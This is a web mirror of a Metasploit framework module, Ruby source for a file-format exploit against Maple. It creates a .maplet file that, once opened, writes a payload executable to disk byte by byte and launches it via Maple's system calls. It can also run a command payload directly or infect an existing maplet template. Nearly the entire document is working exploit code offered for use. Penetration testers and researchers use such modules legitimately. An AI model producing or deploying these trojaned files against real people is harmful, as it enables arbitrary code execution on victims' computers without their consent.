Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/fileformat/maple_maplet.rb
29774 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::FILEFORMAT

10
  include Msf::Exploit::EXE

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Maple Maplet File Creation and Command Execution',

17
        'Description' => %q{

18
          This module harnesses Maple's ability to create files and execute commands

19
          automatically when opening a Maplet. All versions up to 13 are suspected

20
          vulnerable. Testing was conducted with version 13 on Windows. Standard security

21
          settings prevent code from running in a normal maple worksheet without user

22
          interaction, but those setting do not prevent code in a Maplet from running.

23


24
          In order for the payload to be executed, an attacker must convince someone to

25
          open a specially modified .maplet file with Maple. By doing so, an attacker can

26
          execute arbitrary code as the victim user.

27
        },

28
        'License' => MSF_LICENSE,

29
        'Author' => [

30
          'scriptjunkie'

31
        ],

32
        'References' => [

33
          [ 'CVE', '2010-20120' ],

34
          [ 'OSVDB', '64541'],

35
          [ 'URL', 'http://www.maplesoft.com/products/maple/' ]

36
        ],

37
        'Payload' => {

38
          'Space' => 1024,

39
          'BadChars' => '',

40
          'DisableNops' => true

41
          #					'Compat'      =>

42
          #						{

43
          #							'PayloadType' => 'cmd',

44
          #							'RequiredCmd' => 'generic perl telnet',

45
          #						}

46
        },

47
        'Targets' => [

48
          [

49
            'Windows',

50
            {

51
              'Arch' => ARCH_X86,

52
              'Platform' => 'win'

53
            }

54
          ],

55


56
          [

57
            'Windows X64',

58
            {

59
              'Arch' => ARCH_X64,

60
              'Platform' => 'win'

61
            }

62
          ],

63


64
          [

65
            'Linux',

66
            {

67
              'Arch' => ARCH_X86,

68
              'Platform' => 'linux'

69
            }

70
          ],

71


72
          [

73
            'Linux X64',

74
            {

75
              'Arch' => ARCH_X64,

76
              'Platform' => 'linux'

77
            }

78
          ],

79


80
          [

81
            'Universal CMD',

82
            {

83
              'Arch' => ARCH_CMD,

84
              'Platform' => %w[linux unix win]

85
            }

86
          ]

87


88
        ],

89
        'DisclosureDate' => '2010-04-26',

90
        'DefaultTarget' => 0,

91
        'Notes' => {

92
          'Reliability' => UNKNOWN_RELIABILITY,

93
          'Stability' => UNKNOWN_STABILITY,

94
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

95
        }

96
      )

97
    )

98


99
    register_options(

100
      [

101
        OptString.new('TEMPLATE', [ false, 'The file to infect.', '']),

102
        OptString.new('FILENAME', [ true, 'The output file.', 'msf.maplet']),

103
      ]

104
    )

105
  end

106


107
  def exploit

108
    content = ''

109
    if target['Arch'] != ARCH_CMD

110
      # Get payload as executable on whatever platform

111
      binary = generate_payload_exe

112


113
      # Get filename and random variable name for file handle in script

114
      fname = rand_text_alpha(rand(3..17))

115
      if target['Platform'] == 'win'

116
        fname << '.exe'

117
      end

118
      fhandle = rand_text_alpha(rand(3..17))

119


120
      # Write maple commands to create executable

121
      content = fhandle + " := fopen(\"#{fname}\",WRITE,BINARY);\n"

122
      exe = binary.unpack('C*')

123


124
      content << "writebytes(#{fhandle},[#{exe[0]}"

125
      lines = []

126
      1.upto(exe.length - 1) do |byte|

127
        if (byte % 100 == 0)

128
          lines.push "]);\r\nwritebytes(#{fhandle},[#{exe[byte]}"

129
        else

130
          lines.push ",#{exe[byte]}"

131
        end

132
      end

133
      content << lines.join('') + "]);\r\n"

134


135
      content << 'fclose(' + fhandle + ");\n"

136
      # Write command to be executed

137
      if target['Platform'] != 'win'

138
        content << "system(\"chmod a+x #{fname}\");\n"

139
      end

140
      content << "system[launch](\"#{fname}\");\n"

141
    else

142
      content << "system(\"#{payload.encoded}\");\n"

143
    end

144


145
    # Then put the rest of the original maplet

146
    if datastore['TEMPLATE'] != ''

147
      File.open(datastore['TEMPLATE'], 'rb') do |fd|

148
        content << fd.read(File.size(datastore['TEMPLATE']))

149
      end

150
    end

151


152
    # Create the file

153
    print_status("Creating '#{datastore['FILENAME']}' file...")

154
    file_create(content)

155
  end

156
end

157


158